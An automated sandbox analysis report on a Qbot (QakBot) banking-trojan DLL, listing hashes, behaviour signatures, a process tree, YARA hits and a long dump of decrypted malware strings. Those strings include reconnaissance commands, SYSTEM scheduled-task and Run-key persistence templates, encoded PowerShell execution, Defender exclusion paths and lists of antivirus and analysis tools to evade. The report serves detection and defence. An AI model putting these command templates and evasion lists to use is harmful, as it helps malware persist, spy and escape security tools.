Windows Analysis Report
F086.dll

Overview

General Information

Sample Name: F086.dll
Analysis ID: 878699
MD5: 931f3d361902807103b23fa74beb16a2
SHA1: 9ec1f75beaf217246fd8d97fa3d1e591300babb3
SHA256: 5f1a29b7907453a8785d9e6087a85c7bfab6b7fe3955bd645cb37ffdb20409c5
Tags: dll, qbot
Infos:

Detection

Qbot
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Potentially malicious time measurement code found
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7012 cmdline: loaddll32.exe "C:\Users\user\Desktop\F086.dll" MD5: 3B4636AE519868037940CA5C4272091B)
    • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7100 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 684 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7092 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6716 cmdline: rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6712 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5728 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5500 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 5752 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5920 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3308 cmdline: rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
Name: QakBot, qbot, Qbot
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320"}
Source | Rule | Description | Author | Strings
00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000012.00000002.508336162.0000000004320000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
decrypted.memstr | JoeSecurity_Qbot | Yara detected Qbot | Joe Security

Source | Rule | Description | Author | Strings
18.2.rundll32.exe.280c00.0.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
18.2.rundll32.exe.280c00.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
18.2.rundll32.exe.41b0000.1.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
18.2.rundll32.exe.41b0000.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
18.2.rundll32.exe.280c00.0.raw.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 00000012.00000002.508131058.000000000026A000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320"}
Source: 18.2.rundll32.exe.280c00.0.raw.unpack, String decryptor:
  • error res='%s' err=%d len=%u
  • netstat -nao
  • runas
  • ipconfig /all
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
  • net localgroup
  • nltest /domain_trusts /all_trusts
  • %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
  • Microsoft
  • SELF_TEST_1
  • p%08x
  • Self test FAILED!!!
  • Self test OK.
  • /t5
  • whoami /all
  • cmd
  • microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
  • ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
  • route print
  • .lnk
  • "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
  • arp -a
  • %s "$%s = \"%s\"; & $%s"
  • net share
  • cmd.exe /c set
  • Self check
  • %u;%u;%u;
  • /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
  • ProfileImagePath
  • at.exe %u:%u "%s" /I
  • ProgramData
  • Self check ok!
  • powershell.exe
  • qwinsta
  • net view
  • nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
  • Component_08
  • Start screenshot
  • schtasks.exe /Delete /F /TN %u
  • appidapi.dll
  • %s \"$%s = \\\"%s\\\\; & $%s\"
  • c:\ProgramData
  • Component_07
  • bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
  • powershell.exe -encodedCommand %S
  • ERROR: GetModuleFileNameW() failed with error: %u
  • powershell.exe -encodedCommand
  • SoNuce]ugdiB3c[doMuce2s81*uXmcvP
  • \System32\WindowsPowerShell\v1.0\powershell.exe
  • schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
  • error res='%s' err=%d len=%u
  • netstat -nao
  • runas
  • ipconfig /all
  • Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
  • %u.%u.%u.%u.%u.%u.%04x
  • %SystemRoot%\SysWOW64\explorer.exe
  • SystemRoot
  • cscript.exe
  • MBAMService.exe;mbamgui.exe
  • %SystemRoot%\System32\xwizard.exe
  • %SystemRoot%\System32\wermgr.exe
  • AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
  • C:\INTERNAL\__empty
  • .dll
  • Win32_PhysicalMemory
  • ALLUSERSPROFILE
  • image/jpeg
  • LocalLow
  • displayName
  • Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
  • shlwapi.dll
  • %SystemRoot%\SysWOW64\WerFault.exe
  • CommandLine
  • {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • kernel32.dll
  • SubmitSamplesConsent
  • 1234567890
  • wbj.go
  • %SystemRoot%\SysWOW64\wextract.exe
  • Win32_DiskDrive
  • vkise.exe;isesrv.exe;cmdagent.exe
  • System32
  • Name
  • %SystemRoot%\System32\WerFault.exe
  • WRSA.exe
  • c:\\
  • reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
  • SpyNetReporting
  • FALSE
  • aswhookx.dll
  • Packages
  • SonicWallClientProtectionService.exe;SWDash.exe
  • application/x-shockwave-flash
  • Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
  • RepUx.exe
  • %SystemRoot%\System32\mspaint.exe
  • coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
  • Winsta0
  • Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
  • CynetEPS.exe;CynetMS.exe;CynetConsole.exe
  • %SystemRoot%\SysWOW64\wermgr.exe
  • %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
  • avp.exe;kavtray.exe
  • root\SecurityCenter2
  • %SystemRoot%\SysWOW64\backgroundTaskHost.exe
  • MsMpEng.exe
  • %SystemRoot%\System32\CertEnrollCtrl.exe
  • SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
  • userenv.dll
  • csc_ui.exe
  • frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
  • \\.\pipe\
  • pstorec.dll
  • NTUSER.DAT
  • from
  • %SystemRoot%\System32\sethc.exe
  • netapi32.dll
  • %SystemRoot%\System32\Utilman.exe
  • gdi32.dll
  • setupapi.dll
  • SELECT * FROM Win32_Processor
  • iphlpapi.dll
  • Caption
  • CrAmTray.exe
  • ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
  • SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
  • Win32_ComputerSystem
  • %SystemRoot%\System32\backgroundTaskHost.exe
  • %ProgramFiles%\Internet Explorer\iexplore.exe
  • SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
  • user32.dll
  • xagtnotif.exe;AppUIMonitor.exe
  • %SystemRoot%\System32\dxdiag.exe
  • SentinelServiceHost.exe;SentinelStaticuser.exe;SentinelAgent.exe;SentinelStaticuserScanner.exe;SentinelUI.exe
  • \sf2.dll
  • %SystemRoot%\SysWOW64\grpconv.exe
  • egui.exe;ekrn.exe
  • Software\Microsoft
  • %S.%06d
  • bcrypt.dll
  • SELECT * FROM AntiVirusProduct
  • %SystemRoot%\SysWOW64\SndVol.exe
  • %SystemRoot%\explorer.exe
  • %SystemRoot%\SysWOW64\Utilman.exe
  • SOFTWARE\Microsoft\Windows Defender\SpyNet
  • wtsapi32.dll
  • t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
  • %SystemRoot%\SysWOW64\xwizard.exe
  • shell32.dll
  • TRUE
  • Win32_Bios
  • SELECT * FROM Win32_OperatingSystem
  • %SystemRoot%\SysWOW64\mobsync.exe
  • c:\hiberfil.sysss
  • */*
  • %SystemRoot%\SysWOW64\AtBroker.exe
  • abcdefghijklmnopqrstuvwxyz
  • ByteFence.exe
  • type=0x%04X
  • snxhk_border_mywnd
  • ROOT\CIMV2
  • dwuser.exe;dwarkdaemon.exe;dwwatcher.exe
  • https
  • %SystemRoot%\SysWOW64\explorer.exe
  • fshoster32.exe
  • kernelbase.dll
  • regsvr32.exe
  • %s\system32\
  • %SystemRoot%\SysWOW64\dxdiag.exe
  • Content-Type: application/x-www-form-urlencoded
  • Win32_Process
  • rundll32.exe
  • LOCALAPPDATA
  • cmd.exe
  • APPDATA
  • select
  • .exe
  • SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
  • mcshield.exe
  • advapi32.dll
  • ws2_32.dll
  • .cfg
  • aabcdeefghiijklmnoopqrstuuvwxyyz
  • Win32_Product
  • WQL
  • wininet.dll
  • LastBootUpTime
  • S:(ML;;NW;;;LW)
  • %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
  • urlmon.dll
  • Create
  • Win32_PnPEntity
  • %SystemRoot%\System32\grpconv.exe
  • Initializing database...
  • %SystemRoot%\System32\SearchIndexer.exe
  • winsta0\default
  • .dat
  • WBJ_IGNORE
  • next
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • %SystemRoot%\System32\AtBroker.exe
  • wpcap.dll
  • aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
  • %SystemRoot%\SysWOW64\sethc.exe
  • SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
  • image/pjpeg
  • fmon.exe
  • bdagent.exe;vsserv.exe;vsservppl.exe
  • %SystemRoot%\System32\SndVol.exe
  • vbs
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: aswhooka.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SysWOW64
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mspaint.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: mpr.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: image/gif
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: crypt32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: ntdll.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: open
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: CSFalconService.exe;CSFalconContainer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\wextract.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\mobsync.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SystemRoot
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: cscript.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: C:\INTERNAL\__empty
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: .dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Win32_PhysicalMemory
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: ALLUSERSPROFILE
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: image/jpeg
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: LocalLow
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: displayName
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: shlwapi.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: CommandLine
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: kernel32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SubmitSamplesConsent
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: 1234567890
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: wbj.go
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Win32_DiskDrive
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: System32
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Name
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: WRSA.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: c:\\
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SpyNetReporting
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: FALSE
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: aswhookx.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Packages
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: application/x-shockwave-flash
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: RepUx.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Winsta0
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: avp.exe;kavtray.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: root\SecurityCenter2
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: MsMpEng.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: userenv.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: csc_ui.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: \\.\pipe\
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: pstorec.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: NTUSER.DAT
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: from
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: netapi32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: gdi32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: setupapi.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: iphlpapi.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Caption
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: CrAmTray.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Win32_ComputerSystem
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: user32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticuser.exe;SentinelAgent.exe;SentinelStaticuserScanner.exe;SentinelUI.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: \sf2.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: egui.exe;ekrn.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Software\Microsoft
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %S.%06d
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: bcrypt.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: wtsapi32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: shell32.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: TRUE
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: Win32_Bios
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: c:\hiberfil.sysss
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: */*
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: ByteFence.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: type=0x%04X
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: snxhk_border_mywnd
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: ROOT\CIMV2
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: dwuser.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: https
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: fshoster32.exe
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: kernelbase.dll
            Source: 18.2.rundll32.exe.280c00.0.raw.unpackString decryptor: regsvr32.exe
